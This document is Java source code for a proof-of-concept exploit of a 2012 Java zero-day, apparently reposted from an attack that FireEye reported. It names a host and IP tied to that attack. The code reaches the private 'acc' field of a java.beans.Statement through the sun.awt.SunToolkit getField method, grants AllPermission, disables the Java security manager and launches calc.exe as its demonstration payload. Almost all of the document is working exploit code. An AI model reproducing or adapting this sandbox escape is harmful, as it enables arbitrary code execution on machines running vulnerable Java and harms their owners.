//// CVE-2012-XXXX Java 0day//// reported here: http://blog.fireeye.com/re

1. //
2. // CVE-2012-XXXX Java 0day
3. //
4. // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
5. //
6. // secret host / ip : ok.aa24.net / 59.120.154.62
7. //
8. // regurgitated by jduck
9. //
10. // probably a metasploit module soon...
11. //
12.  
13. import java.beans.Expression;
14. import java.beans.Statement;
15. import java.lang.reflect.Field;
16. import java.net.URL;
17. import java.security.*;
18. import java.security.cert.Certificate;
19.  
20. public class Gondvv
21. {
22.  
23.     public Gondvv()
24.     {
25.     }
26.  
27.     public static void disableSecurity()
28.         throws Throwable
29.     {
30.         Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
31.         Permissions localPermissions = new Permissions();
32.         localPermissions.add(new AllPermission());
33.         ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
34.         AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
35.             localProtectionDomain
36.         });
37.         SetField(Statement.class, "acc", localStatement, localAccessControlContext);
38.         localStatement.execute();
39.     }
40.  
41.     private static Class GetClass(String paramString)
42.         throws Throwable
43.     {
44.         Object arrayOfObject[] = new Object[1];
45.         arrayOfObject[0] = paramString;
46.         Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
47.         localExpression.execute();
48.         return (Class)localExpression.getValue();
49.     }
50.  
51.     private static void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
52.         throws Throwable
53.     {
54.         Object arrayOfObject[] = new Object[2];
55.         arrayOfObject[0] = paramClass;
56.         arrayOfObject[1] = paramString;
57.         Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
58.         localExpression.execute();
59.         ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
60.     }
61.  
62.     public static void main(String[] args)
63.     {
64.         try
65.         {
66.             disableSecurity();
67.             Process localProcess = null;
68.             localProcess = Runtime.getRuntime().exec("calc.exe");
69.             if(localProcess != null);
70.                localProcess.waitFor();
71.         }
72.         catch(Throwable localThrowable)
73.         {
74.             localThrowable.printStackTrace();
75.         }
76.     }
77.  
78.    
79. }